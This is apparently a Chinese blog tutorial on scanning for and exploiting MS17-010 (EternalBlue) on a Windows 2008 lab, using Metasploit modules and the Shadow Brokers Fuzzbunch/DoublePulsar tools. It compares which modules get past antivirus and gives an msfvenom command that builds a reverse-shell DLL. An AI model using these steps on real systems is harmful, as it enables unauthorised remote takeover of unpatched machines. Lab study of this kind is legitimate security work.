Drunkmars's Blog

MS17_010检测及打法

字数统计: 531阅读时长: 2 min
2021/05/11

本文将会介绍msf中和MS17_010相关的模块以及具体利用手法。

环境准备

win2008:192.168.10.3 关闭命名管道和共享的匿名访问

win2008 克隆:192.168.10.18 开启命名管道和共享的匿名访问(准备一个360的安装包)

打开gpedit.msc禁用网络访问:限制对命名管道和共享的匿名访问即可

漏洞复现

模块介绍

扫描模块

1
auxiliary/scanner/smb/smb_ms17_010

漏洞利用

1
2
3
4
5
auxiliary/admin/smb/ms17_010_command

exploit/windows/smb/ms17_010_eternalblue

exploit/windows/smb/ms17_010_psexec

检测命名管道

1
auxiliary/admin/smb/ms17_010_command

永恒之蓝检测

1
use auxiliary/scanner/smb/smb_version

无杀软情况

1
auxiliary/admin/smb/ms17_010_command

先使用auxiliary/admin/smb/ms17_010_command模块探测是否可以使用命名管道

1
2
3
4
5
6
7
8
9
use auxiliary/admin/smb/ms17_010_command

set rhosts 192.168.10.3 192.168.10.18

set command tasklist

show options

run

如果能够使用命名管道则优先考虑以下两个模块

1
2
3
4
5
auxiliary/admin/smb/ms17_010_command

exploit/windows/smb/ms17_010_psexec

exploit/windows/smb/ms17_010_psexec

ms17_010_eternalblue

该模块的优点是不需要匿名管道,但是容易造成目标蓝屏,实际利用中不建议使用

有杀软情况

使用exploit/windows/smb/ms17_010_eternalblue进行实验

发现反弹不回session,回到安装虚拟机上看已经被拦截

使用exploit/smb/ms17_010_exec也被拦截

使用auxiliary/admin/smb/ms17_010_command模块可以成功

原生py

这里需要用到python和一个x86的系统,x86系统xp和win7都可以

python2.6.6下载地址如下:

https://www.python.org/download/releases/2.6.6/

在shadowbroker的windows目录下找到Fuzzbunch.xml文件

打开文件对这两个地方进行编辑

在同目录下运行fb.py,查看报错

在同目录下创建一个listeningposts文件夹

再运行fb.py即可正常运行

除了标注的地方其他地方回车即可

可以看到利用成功了,这时候我们要通过注入dll的方式来得到一个反弹shell

这里用msf生成一个dll

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.161 LPORT=2333 -f dll > a.dll

msf开启监听端口

使用Doublepulsar模块注入dll

回到监听处已经返回了shell

chcp 65001设置下乱码的问题

CATALOG
  1. 1. 环境准备
  2. 2. 漏洞复现
    1. 2.1. 模块介绍
    2. 2.2. 永恒之蓝检测
    3. 2.3. 无杀软情况
    4. 2.4. 有杀软情况
    5. 2.5. 原生py